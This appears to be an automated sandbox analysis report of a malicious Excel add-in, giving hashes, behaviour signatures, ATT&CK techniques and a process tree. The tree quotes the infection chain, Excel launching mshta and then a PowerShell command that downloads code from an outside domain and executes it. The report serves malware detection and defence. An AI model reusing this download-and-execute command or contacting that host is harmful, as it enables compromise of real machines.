Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22-05-2024 23:49

General

  • Target

    a7c21bf99b3b3dbbfe973a74e30427892adff537d14bfe5ec726aa3e8e62092d.xll

  • Size

    12KB

  • MD5

    80556a4dacee552a7fd1e09ba60197cc

  • SHA1

    febac442c58243ee9dffed813c6138b0e17bcd76

  • SHA256

    a7c21bf99b3b3dbbfe973a74e30427892adff537d14bfe5ec726aa3e8e62092d

  • SHA512

    5d00965961578744084d61ef0702633b47a387bc6e96c42a7e350e9a52372e74de37513bc101918aa5ac730bba2c58e249b788b1ccd11e197893a772b99dbb97

  • SSDEEP

    192:DL29RBzDzeobchBj8JON4ONGruaUrEPEjr7AhD:/29jnbcvYJO10uaUvr7CD

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\a7c21bf99b3b3dbbfe973a74e30427892adff537d14bfe5ec726aa3e8e62092d.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:240
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2116
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1856

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\RV9E03Y0\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3x3rkqgr.3ov.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\a7c21bf99b3b3dbbfe973a74e30427892adff537d14bfe5ec726aa3e8e62092d.xll
    Filesize

    12KB

    MD5

    80556a4dacee552a7fd1e09ba60197cc

    SHA1

    febac442c58243ee9dffed813c6138b0e17bcd76

    SHA256

    a7c21bf99b3b3dbbfe973a74e30427892adff537d14bfe5ec726aa3e8e62092d

    SHA512

    5d00965961578744084d61ef0702633b47a387bc6e96c42a7e350e9a52372e74de37513bc101918aa5ac730bba2c58e249b788b1ccd11e197893a772b99dbb97

  • memory/240-21-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-84-0x00007FF986D10000-0x00007FF986D20000-memory.dmp
    Filesize

    64KB

  • memory/240-4-0x00007FF9C6D23000-0x00007FF9C6D24000-memory.dmp
    Filesize

    4KB

  • memory/240-6-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-9-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-8-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-7-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-10-0x00007FF9844F0000-0x00007FF984500000-memory.dmp
    Filesize

    64KB

  • memory/240-18-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-12-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-13-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-14-0x00007FF9844F0000-0x00007FF984500000-memory.dmp
    Filesize

    64KB

  • memory/240-17-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-16-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-15-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-20-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-19-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-0-0x00007FF986D10000-0x00007FF986D20000-memory.dmp
    Filesize

    64KB

  • memory/240-11-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-3-0x00007FF986D10000-0x00007FF986D20000-memory.dmp
    Filesize

    64KB

  • memory/240-86-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/240-5-0x00007FF986D10000-0x00007FF986D20000-memory.dmp
    Filesize

    64KB

  • memory/240-85-0x00007FF986D10000-0x00007FF986D20000-memory.dmp
    Filesize

    64KB

  • memory/240-83-0x00007FF986D10000-0x00007FF986D20000-memory.dmp
    Filesize

    64KB

  • memory/240-82-0x00007FF986D10000-0x00007FF986D20000-memory.dmp
    Filesize

    64KB

  • memory/240-2-0x00007FF986D10000-0x00007FF986D20000-memory.dmp
    Filesize

    64KB

  • memory/240-1-0x00007FF986D10000-0x00007FF986D20000-memory.dmp
    Filesize

    64KB

  • memory/240-66-0x00007FF9C6C80000-0x00007FF9C6E89000-memory.dmp
    Filesize

    2.0MB

  • memory/1856-59-0x00000000061E0000-0x00000000061FE000-memory.dmp
    Filesize

    120KB

  • memory/1856-60-0x0000000006230000-0x000000000627C000-memory.dmp
    Filesize

    304KB

  • memory/1856-61-0x0000000007A80000-0x00000000080FA000-memory.dmp
    Filesize

    6.5MB

  • memory/1856-62-0x00000000066F0000-0x000000000670A000-memory.dmp
    Filesize

    104KB

  • memory/1856-58-0x0000000005D70000-0x00000000060C7000-memory.dmp
    Filesize

    3.3MB

  • memory/1856-48-0x0000000005C20000-0x0000000005C86000-memory.dmp
    Filesize

    408KB

  • memory/1856-47-0x0000000005450000-0x0000000005472000-memory.dmp
    Filesize

    136KB

  • memory/1856-46-0x0000000005500000-0x0000000005B2A000-memory.dmp
    Filesize

    6.2MB

  • memory/1856-45-0x00000000029E0000-0x0000000002A16000-memory.dmp
    Filesize

    216KB

  • memory/1856-49-0x0000000005D00000-0x0000000005D66000-memory.dmp
    Filesize

    408KB